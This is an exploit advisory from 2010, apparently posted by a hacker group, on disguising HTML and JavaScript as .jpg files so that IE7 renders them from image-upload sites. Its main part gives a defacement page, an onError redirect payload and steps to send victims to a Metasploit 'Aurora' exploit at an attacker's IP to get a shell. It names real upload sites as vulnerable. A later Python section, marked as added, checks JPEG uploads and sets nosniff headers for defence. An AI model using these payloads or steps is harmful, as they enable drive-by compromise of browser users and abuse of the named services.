Topic : Internet Explorer 8/7 Java Html Codes INJECTION
SecurityAlert : 7079
CVE : CVE-2010-0249
CWE : CWE-327
CWE : CWE-399
SecurityRisk : High
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : Yes
Exploit Available : Yes
Credit : 7H3_BoSs
Published : 06.03.2010
Affected Software :
microsoft:internet_explorer:6
microsoft:internet_explorer:6:sp1
microsoft:internet_explorer:7
microsoft:internet_explorer:8
 Advisory Content : #############################################
#
#
# [+] IE 7 Java & Html Codes INJECTION
# [+] Discovered By 7H3 BoSs
#
#
#############################################
#
#
#
# [] Founder : [ 7H3 BoSs ]
# [] Members : [ ReZa , sub.z3l2o , Wishe ]
# [] Team : [ KatRina iRanian Security Team ]
# [] Greetz : [ ReZa , sub.z3l2o , Wishe , NEO ]
#
#
#
###########################################################################
####################################
#
#
# [+] html Exploit Example :
#
# Open A text document and insert a html code in that like this :
#
# <html>
# <head>
# <title>Hacked By KatRina Iranian Hackers</title>
# </head>
# <body bgcolor=black text=White>
# <center><h2>Hacked By KatRina Iranian Hackers</h2>
# <img src='http://www.gciran.com/services/graphic/star.jpg'>
# <br>
# <h2>We Are : </h2>
# <bR>
# <h2>ReZa , SuB zErO , Wishe , 7H3 BoSs</h2>
# </center></body>
# </html>
#
# then save it as jpg format
#
###########################################################################
####################################
#
# [+] java Script Exploit Example :
#
# Open A text document and insert a java script code in that like this :
#
#
# <img src="" onError="document.location='http://google.com'">
#
# then save it as jpg format
#
#################################################
#
# [+] Introduction :
#
# then save html code as jpg like KatRina.jpg
# or insert java script codes and save it again as jpg file
# then upload image in vulnerable images upload centers
# remember 30% of upload centers are vulnerable but not all
#
#
##################################################
#
#
# [+] Html INJECTION :
#
# I created a text document and inserted html code in that then saved it as jpg
# My file name is Katrina.jpg thus I uploaded it in a vulnerable upload center
#
# in this image upload center : http://datairan.gigfa.com/index.php
# Uploaded file : http://datairan.gigfa.com/files/axc0goer2hor9499need.jpg
# note : open in IE7 and you can see html code injected
#
# another upload center : http://upload.mamazy.net
# bypassed : http://upload.mamazy.net/images/oncljs8ef6qng40kily.jpg
#
# another upload center : http://up.iranblog.com/
# bypassed : http://up.iranblog.com/37261/1267616595.jpg
#
#
#################################################
#
# [+] Java Script INJECTION :
#
#
# I created a text document then inserted Java Script code in that and saved it as jpg
# my file name is KatRina.jpg and I inserted :
#
# <img src="" onError="document.location='http://google.com'">
#
# and saved it as jpg and uploaded it in a vulnerable upload center and a victim with IE7
# will be redirected to google.com !!!
# Example : http://up.iranblog.com/37261/1267642065.jpg
# open with IE7 and you will be redirected to http://google.com
# note this is example and you can do many things with this
# for instance you can use "Aurora" IE Exploit in metasploit and exploit it as http://yourIP:8080/
# and do it like this :
#
# open a text document and insert :
#
# <img src="" onError="document.location='http://yourIP:8080'">
#
# then save as jpg and upload it in a vulnerable image hosting and give uploaded url to victim
# and he or she will be redirected to your exploit url and you can gain shell of victim system !!!
#
###########################################################################
####################################
#
#
# [+] some vulnerable upload center : http://up.iranblog.com/
# http://datairan.gigfa.com/index.php
# http://fuc.ir/
# http://upload.mamazy.net
#
#
#################################################
#
#
# [+] Note :
#
# you can do many things with this method and use many html or java script codes or both !
#
#
# ENJOY !
#
##################################################
#
#
#
# [+] Contact :
# i.The.l3oSs.i@Gmail.Com
#
#
#
###################################################
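
Added example (not part of the original advisory or of any upload center's code): a server-side check an image host can run before storing a file uploaded under a .jpg name, plus response headers for serving it. The function names, the tag list and the 256-byte window (the leading bytes IE's MIME sniffing inspects) are assumptions of this sketch; the sample inputs are constructed.

```python
import re

JPEG_SOI = b"\xff\xd8\xff"  # start-of-image marker plus first segment byte
JPEG_EOI = b"\xff\xd9"      # end-of-image marker
SNIFF_WINDOW = 256          # leading bytes examined by IE's MIME sniffing

# Assumed (not exhaustive) list of tags that make content look like HTML.
HTML_TOKENS = re.compile(
    rb"<\s*(?:!doctype|!--|html|head|title|body|script|img|iframe|"
    rb"h[1-6]|center|table|div|a\s)",
    re.IGNORECASE,
)

def check_jpeg_upload(data):
    """Return (accepted, reason) for bytes uploaded under a .jpg name."""
    if not data.startswith(JPEG_SOI):
        return False, "no JPEG start-of-image marker"
    if JPEG_EOI not in data[len(JPEG_SOI):]:
        return False, "no JPEG end-of-image marker"
    if HTML_TOKENS.search(data[:SNIFF_WINDOW]):
        return False, "HTML markup in leading bytes"
    return True, "ok"

def image_response_headers():
    """Headers for serving a stored upload so it is not rendered as a page."""
    return {
        "Content-Type": "image/jpeg",
        "X-Content-Type-Options": "nosniff",  # honoured by IE8 and later
        "Content-Disposition": 'inline; filename="upload.jpg"',
    }

# Constructed samples: the text file from the advisory, a minimal JPEG-like
# byte string, and a file with a JPEG header wrapped around markup.
TEXT_AS_JPG = b"<img src=\"\" onError=\"document.location='http://google.com'\">"
MINIMAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32 + JPEG_EOI
WRAPPED_HTML = JPEG_SOI + b"\xe0<html><body>x</body></html>" + JPEG_EOI

if __name__ == "__main__":
    for name, blob in [("text", TEXT_AS_JPG), ("jpeg", MINIMAL_JPEG),
                       ("wrapped", WRAPPED_HTML)]:
        print(name, check_jpeg_upload(blob))
```

The nosniff header is not honoured by IE7, so for that browser the content check at upload time is the control that matters; re-encoding accepted images with an image library is stronger than marker checks alone.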
References :
http://www.us-cert.gov/cas/techalerts/TA10-055A.html
http://www.kb.cert.org/vuls/id/492515
http://xforce.iss.net/xforce/xfdb/55642
http://www.vupen.com/english/advisories/2010/0135
http://www.securityfocus.com/bid/37815
http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx
http://www.microsoft.com/technet/security/advisory/979352.mspx
http://www.exploit-db.com/exploits/11167
http://support.microsoft.com/kb/979352
http://securitytracker.com/id?1023462
http://osvdb.org/61697
http://news.cnet.com/8301-27080_3-10435232-245.html
http://blogs.technet.com/msrc/archive/2010/01/14/security-advisory-979352.aspx